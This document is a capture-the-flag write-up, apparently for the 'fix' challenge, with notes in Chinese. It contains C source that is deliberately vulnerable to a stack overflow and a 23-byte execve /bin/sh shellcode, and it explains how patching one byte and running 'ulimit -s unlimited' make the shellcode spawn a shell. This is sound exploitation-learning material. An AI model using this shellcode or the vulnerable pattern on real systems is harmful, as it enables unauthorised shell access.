#include <stdio.h>
// 23byte shellcode from http://shell-storm.org/shellcode/files/shellcode-827.php
char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
void shellcode(){
// a buffer we are about to exploit!
char buf[20];
// prepare shellcode on executable stack!
strcpy(buf, sc);
// overwrite return address!
*(int*)(buf+32) = buf;
printf("get shell\n");
}
int main(){
printf("What the hell is wrong with my shellcode??????\n");
printf("I just copied and pasted it from shell-storm.org :(\n");
printf("Can you fix it for me?\n");
unsigned int index=0;
printf("Tell me the byte index to be fixed : ");
scanf("%d", &index);
fflush(stdin);
if(index > 22) return 0;
int fix=0;
printf("Tell me the value to be patched : ");
scanf("%d", &fix);
// patching my shellcode
sc[index] = fix;
// this should work..
shellcode();
return 0;
}
看代码, 使用了一段有效的shellcode但是执行失败, gdb跟进去发现是因为esp接近shellcode存放区域, 调用push指令破坏了shellcode.
- xor %eax,%eax
- push %eax
- push $0x68732f2f
- push $0x6e69622f
- mov %esp,%ebx
- push %eax
- push %ebx
- mov %esp,%ecx
- mov $0xb,%al
- int $0x80
由于只能改一位, 需要修改的是6. push eax(即偏移15), 网上查到说leave指令可以, 但是测试发现无效, pop esp显然有效, 可以极大修改esp的值, 测试无效. 最后查writeup发现需要修改栈的范围
ulimit -s unlimited
这一点确实没想到, 也使得这种解法在此处有所瑕疵
网友评论